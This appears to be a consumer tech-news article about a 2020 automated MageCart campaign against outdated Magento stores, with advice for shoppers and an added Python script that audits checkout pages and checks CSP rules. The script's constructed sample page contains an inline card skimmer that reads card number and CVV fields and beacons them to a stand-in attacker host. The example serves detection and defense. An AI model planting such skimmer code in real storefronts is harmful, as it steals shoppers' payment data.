It’s bad enough when an online platform like a social network or game gets hacked. But when an online store — and all of its customers’ payment information — finds its way into hackers’ hands, you have an absolute disaster in the making.
Cyberattacks on e-commerce websites are becoming more common each year. Some involve breaking directly into the retailer's own systems; others involve rigging the storefront itself so that credit card numbers and personal data are stolen as shoppers type them in. Tap or click here for a rundown on some of last year's biggest eCommerce hacks.
And now, one of the biggest e-commerce hacks since 2015 has targeted a system that thousands of online stores rely on: Magento. Because many stores were still running an outdated, unsupported version of the platform, almost 2,000 of them were altered to steal credit card information from customers. Here's how we think it happened, and what you can do to stay safe.
The ultimate MageCart attack?
A new report by researchers at Sanguine Security showed nearly 2,000 separate online stores were compromised in what it’s calling the largest automated MageCart campaign ever.
For those who don’t know, a MageCart attack involves compromising an online store so the check-out page will steal data typed in by customers — especially credit card details. Tap or click here for more details on how this cyberattack pattern works.
These websites all had one thing in common: a back end running Magento, a powerful e-commerce platform owned by Adobe. The majority of the hacked sites were running an outdated version of Magento that lacked some of the security features included in the latest version, and that is what the hackers exploited to carry out the attacks.
From September 11 through 14, 2020, Sanguine Security detected 1,904 Magento stores that had been compromised. Each had malicious code injected into its check-out page to capture what customers typed and send it to a URL controlled by the hackers.
Although it is not known exactly which exploit the hackers used, posts on a dark web forum dating back to August advertised several Magento exploits for upwards of $5,000. The seller dealt with a total of 10 buyers, which may explain how the hackers were able to pull off such a coordinated effort.
Magento version 1 is an end-of-life product, which means it no longer receives official support or security patches. Merchants who still rely on it should use this incident as the push to migrate to a supported release such as Magento 2, which has more robust built-in security, and then keep it patched: a supported platform only stays secure if updates are actually applied.
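The injection described above is exactly what a merchant's own page audit should catch. What follows is an added example, not code from the original article, from Sanguine Security or from Adobe: an offline check over a saved copy of a checkout page that flags external scripts loaded from hosts outside a known-good allowlist, flags inline scripts that read payment fields and also contain a network call to an outside host (the skimmer shape: read the card number, beacon it out), and, going a step beyond the article, reports whether a Content-Security-Policy header served with the page would have permitted the exfiltration destination. The allowlist, the sample page, the CSP string and every hostname in them are constructed for the demo.

```python
# Added example, not code from the article, Sanguine Security or Adobe: an offline
# audit of a saved checkout page for MageCart-style injections, plus a simplified
# CSP check. Allowlist, sample page and every hostname are constructed for the demo.
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "www.paypal.com"}  # hypothetical

PAYMENT_FIELD_RE = re.compile(r"(cc[_-]?number|card[_-]?number|cvv|cvc|expir)", re.I)
EXFIL_PRIMITIVE_RE = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new\s+Image\()")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


class _ScriptCollector(HTMLParser):
    """Collects external <script src> values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def audit_checkout_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail) findings; relative script paths are same-origin and skipped."""
    p = _ScriptCollector()
    p.feed(html)
    findings = [("unknown_external_script", src)
                for src in p.external if _host(src) and _host(src) not in allowed_hosts]
    for body in p.inline:  # skimmer shape: touches card fields AND sends data out
        if PAYMENT_FIELD_RE.search(body) and EXFIL_PRIMITIVE_RE.search(body):
            findings += [("inline_skimmer_pattern", u)
                         for u in URL_RE.findall(body) if _host(u) not in allowed_hosts]
    return findings


def csp_allows(csp_header, directive, url, page_host):
    """Simplified CSP check: does `directive` (falling back to default-src) permit `url`?
    Handles 'none', 'self', '*', scheme, host and *.wildcard sources; nonces/hashes ignored."""
    policy = {}
    for part in csp_header.split(";"):
        toks = part.split()
        if toks:
            policy[toks[0].lower()] = toks[1:]
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True  # neither the directive nor default-src present: unrestricted
    h, scheme = _host(url), urlparse(url).scheme.lower()
    for s in (t.strip("'").lower() for t in sources):
        if s == "none":
            return False
        if s == "*" or s == scheme + ":" or s == h or (s == "self" and h == page_host):
            return True
        if s.startswith("*.") and h.endswith(s[1:]):
            return True
        if "://" in s and _host(s) == h:
            return True
    return False


# Constructed checkout page: one unknown CDN script plus an inline skimmer.
SAMPLE_PAGE = """<html><body><form id="checkout"><input name="cc_number"><input name="cc_cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/payment.js"></script>
<script src="//static.evil-cdn.example/jquery.min.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cc_number]').value,
           c: document.querySelector('[name=cc_cvv]').value};
  new Image().src = 'https://collect.evil-cdn.example/i?d=' + btoa(JSON.stringify(d));
});
</script></body></html>"""

# Hypothetical policy a store could serve with its checkout page.
STRICT_CSP = ("default-src 'self'; script-src 'self' https://cdn.shop.example; "
              "connect-src 'self'; img-src 'self' https://cdn.shop.example")

if __name__ == "__main__":
    print(audit_checkout_html(SAMPLE_PAGE))
    print(csp_allows(STRICT_CSP, "img-src", "https://collect.evil-cdn.example/i", "shop.example"))
```

Run against a saved copy of a live checkout page, the audit surfaces the protocol-relative script from the unknown CDN and the inline beacon to the collection host; the same beacon is rejected by the strict policy's img-src but allowed by a lax `default-src *` or by no policy at all. The CSP evaluator is deliberately simplified (no nonce, hash or path matching) and is meant for judging exfiltration destinations, not as a full policy engine.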
I was shopping online over the weekend. Am I in trouble?
While there isn't a public list of every store affected by the hack, Sanguine Security has shared the names of the affected stores with law enforcement. If you were affected, expect the site owner to reach out to you about your status.
If you're told that your data was leaked, call your bank or credit card provider right away and let them know your card information was compromised. They can cancel and reissue the card and watch for fraudulent charges. You may also want to speak to a credit bureau about a freeze on your credit for peace of mind. Tap or click here to see how to set up a credit freeze.
To protect yourself from MageCart attacks going forward, you must be vigilant and cautious. Part of what makes these attacks so scary is that they are invisible to the shopper: the store looks and works normally while the injected code copies what you type. But if you keep these factors in mind, you will be much safer:
- Shopping big vs shopping small: Small, independent stores are at higher risk for these kinds of attacks. Sites like Amazon, Walmart and Target dedicate huge portions of their budgets to cybersecurity, and as a result, are far less vulnerable.
- Use a go-between: Payment services like PayPal are one of the easiest ways to make secure transactions that won't expose your data to MageCart attacks. When you check out with PayPal, you're redirected to pay on PayPal's own website, so malicious code injected into the store's check-out page never sees your card number. Before you type anything, confirm that the address bar really shows paypal.com; a compromised store can also display a fake "PayPal" form on its own pages. Tap or click here to see the safest ways to pay online.
- Don’t save credit card details in your browser: If your system ever gets hacked or someone snoops on your machine, having credit or debit card numbers saved in your browser can turn into a nightmare. Tap or click here to find out how to remove saved payment card details from your browser.
In addition to these steps, the usual advice of strong passwords and two-factor authentication applies. Those protect your accounts rather than the store's check-out page (a skimmer captures card details as you type them, however well your account is secured), but by forcing hackers to take an extra step to log in, you give yourself a chance to catch them in the act. Tap or click here to set up two-factor authentication for the most popular platforms on the web.